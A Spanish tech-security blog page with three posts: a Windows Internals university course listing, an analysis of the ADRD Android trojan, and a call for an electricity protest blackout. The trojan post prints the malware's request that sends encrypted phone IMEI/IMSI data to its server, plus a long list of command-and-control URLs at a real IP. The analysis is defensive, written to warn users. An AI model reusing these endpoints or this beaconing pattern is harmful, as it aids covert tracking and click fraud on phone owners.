Curso de Windows Internals

  • February 15, 2011
  • tuxotron

    • win_internals.png

    Orientado obviamente a Windows, este curso pretende dar una visión técnica de las entrañas este sistema operativo. Cubre desde la arquitectura de Windows hasta la seguridad, pasando por los mecanismos del núcleo, la API de Windows, sincronización, procesos, hilos, manejo de memoria, etc

    Durante el curso se hará uso de Windows Internals como libro de texto. Además necesitarás una serie de utilidades y un pequeño laboratorio de prácticas. En este PDF encontrarás como montarte dicho laboratorio y además necesitarás Sysinternal tools suite y CRK tools suite.

    En este momento se encuentran disponibles 14 clases o charlas. En el siguiente cuadro podéis ver las charlas con sus correspondientes diapositivas, referencia al libro de texto, tareas asignadas y sus soluciones.

    Lecture Date Topic Slides Resources Homework
    1 11/15/2010 Introduction, OS Evolution and Reviews [pdf] Textbook pp.1
    2 11/17/2010 Windows Concepts and Tools [pdf] Textbook pp.2-32 [Lab] [Quiz Soln]
    3 11/22/2010 Windows Structuring [pdf] Textbook pp.33-83 [Lab]
    4 11/24/2010 Core System Mechanisms and Windows API [pdf] Textbook pp.133-169, 198-199, 202-206,211-215 [Assignment] [Solution] [Lab]
    5 11/29/2010 Concurrency (I) -- Windows Traps [pdf] Textbook pp. 85 - [Lab] [Quiz soln]
    6 12/1/2010 Concurrency (II) -- Windows Synchronization [pdf] Textbook pp. 170-198, 1021- [Assignment] [Solution] [Lab]
    7 12/6/2010 Windows Processes and Threads [pdf] Textbook pp. 335 - [Lab]
    8 12/8/2010 Thread Scheduling [pdf] Textbook pp. 391 - [Assignment] [Solution] [Lab]
    9 12/13/2010 Memory Management (I) [pdf] Textbook pp.699-735, 818-835 [Lab]
    10 12/15/2010 Memory Management (II) [pdf] Textbook pp. 736-784, 803-818 [Assignment] [Solution] [Quiz soln]
    11 12/20/2010 I/O System (I) [pdf] Textbook pp. 537-, 541-, 562-) [Lab]
    12 12/22/2010 I/O System (II) [pdf] Textbook pp. 606- [Assignment] [Solution] [Lab] [Quiz soln]
    13 12/27/2010 Windows File Systems (I) [pdf] Textbook pp.890-, 895-, 918-, 937- [Lab]
    14 12/29/2010 Windows File System (II) [pdf] Textbook pp. [Assignment] [Solution] [Quiz_Soln]
    15 1/3/2010 Class canceled (New year Holiday) [pdf] Textbook pp. [Assignment] [Lab]
    16 1/5/2010 Project 1 Presentation [Assignment] [Lab]
    Sin duda alguna un material de gran valor, para aquellos que quieran profundizar y conocer mejor el sistema de los chicos de Redmon.

    Enlace oficial del curso.

ADRD, otro troyano para Android

  • February 15, 2011
  • tuxotron

    • android_trojan.jpeg

    AegisLab ha encontrado otro troyano para Android que actualmente está vivito y coleando. El autor de éste, por lo visto lo que hace es re-empaquetar software legítimo, añadiéndole el código de dicho troyano. Este malware, por ahora, es común encontrarlo en los fondos de escritorios o wallpapers.

    En principio todo lo que hace es aparte de mandar tu IMEI e IMSI a cierto servidor (adrd.taxuan.net) de forma cifrada (DES). Aquí un ejemplo:

    POST /index.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a5471587b5db8848de8d7a2efc443455fa0839828c592920ddc1ec6ea1b3acf2b97d46 HTTP/1.1
HOST: adrd.taxuan.net

    Como se puede observar el parámetro im está cifrado, cuyo texto en claro es:

    354059xxxxxxxxx&310260xxxxxxxxx&1&6&adrd.zt.cw.4 (las x's son tu IMEI e IMSI).

    Luego el servidor la manda al troyano una serie de URLs:

    B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#961a_w1|http://59.173.12.105/g/g.ashx?w=961a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#964a_w1|http://59.173.12.105/g/g.ashx?w=964a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#881d_w1|http://59.173.12.105/g/g.ashx?w=881d_w1|1|http://59.173.12.105/add/pk.aspx$%3Cbr%20/%3EB#1#978a_w1|http://59.173.12.105/g/g.ashx?w=978a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#979a_w1|http://59.173.12.105/g/g.ashx?w=979a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#609b_w1|http://59.173.12.105/g/g.ashx?w=609b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1044a_w1|http://59.173.12.105/g/g.ashx?w=1044a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999a_w1|http://59.173.12.105/g/g.ashx?w=999a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999b_w1|http://59.173.12.105/g/g.ashx?w=999b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999c_w1|http://59.173.12.105/g/g.ashx?w=999c_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059a_w1|http://59.173.12.105/g/g.ashx?w=1059a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1060a_w1|http://59.173.12.105/g/g.ashx?w=1060a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059b_w1|http://59.173.12.105/g/g.ashx?w=1059b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086d_w1|http://59.173.12.105/g/g.ashx?w=1086d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086e_w1|http://59.173.12.105/g/g.ashx?w=1086e_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086f_w1|http://59.173.12.105/g/g.ashx?w=1086f_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086g_w1|http://59.173.12.105/g/g.ashx?w=1086g_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086h_w1|http://59.173.12.105/g/g.ashx?w=1086h_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086r_w1|http://59.173.12.105/g/g.ashx?w=1086r_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086t_w1|http://59.173.12.105/g/g.ashx?w=1086t_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089b_w1|http://g.gxsmy.com/?w=1089b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089c_w1|http://g.gxsmy.com/?w=1089c_w1|1|http://59.173.12.105/add/pk.asp%3Cbr%20/%3Ex$B#1#1089d_w1|http://g.gxsmy.com/?w=1089d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#962a_w1|http://59.173.12.105/g/g.ashx?w=962a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#768b_w1|http://59.173.12.105/g/g.ashx?w=768b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#965a_w1|http://59.173.12.105/g/g.ashx?w=965a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#780b_w1|http://59.173.12.105/g/g.ashx?w=780b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#834b_w1|http://59.173.12.105/g/g.ashx?w=834b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#959a_w1|http://59.173.12.105/g/g.ashx?w=959a_w1|1|http://59.173.12.105/add/pk.aspx$

    Luego el troyano escoge una y accede a la misma. Por ejemplo accediendo a esta url:

    http://59.173.12.105/g/g.ashx?w=780b_w1

    Obtenemos como respuesta:

    2|http://wap.baidu.com/s?word=%e6%82%b2%e5%89%a7%e7%89%87&vit=uni&from=780b_w1

    ¿El beneficio de ello? Lo mismo el autor se gana un dinerito con visitas a dichas páginas…

    ¿Cómo se activa el troyano? Pues la forma en que éste funciona es, cuando el usuario instala la aplicación, ésta registra varios receivers como son: RECEIVE_BOOT_COMPLETED o ACCESS_NETWORK_STATE. Cuando nuestro terminal se inicializa por completo el troyano es notificado y ejecuta un proceso en segundo plano que lleva a cabo las operaciones de las que hemos hablado más arriba.

    Cuidado con lo que instalas y sobre todo desde donde te lo bajas.

    Fuente

"Apagón General" por el sometimiento del Gobierno a las Eléctricas

  • February 15, 2011
  • okajey

    • apagon

    Hoy, día del consumidor, esta convocado un apagón general de 5 minutos a las 22:00 en señal de protesta por la subida abusiva que ENDESA, IBERDROLA y FENOSA han llevado a cabo en sus tarifas eléctricas y que, además, el Gobierno apoya.

Siguiente
Anterior
Libros

Docker: SecDevOps LibroMicrohistorias

Machine Learning aplicado a Ciberseguridad: Técnicas y ejemplos en la detección de amenazas Kubernetes para profesionales: Desde cero al despliegue de aplicaciones seguras y resilientes

Buscar
Entradas Recientes
Categorías
Enlaces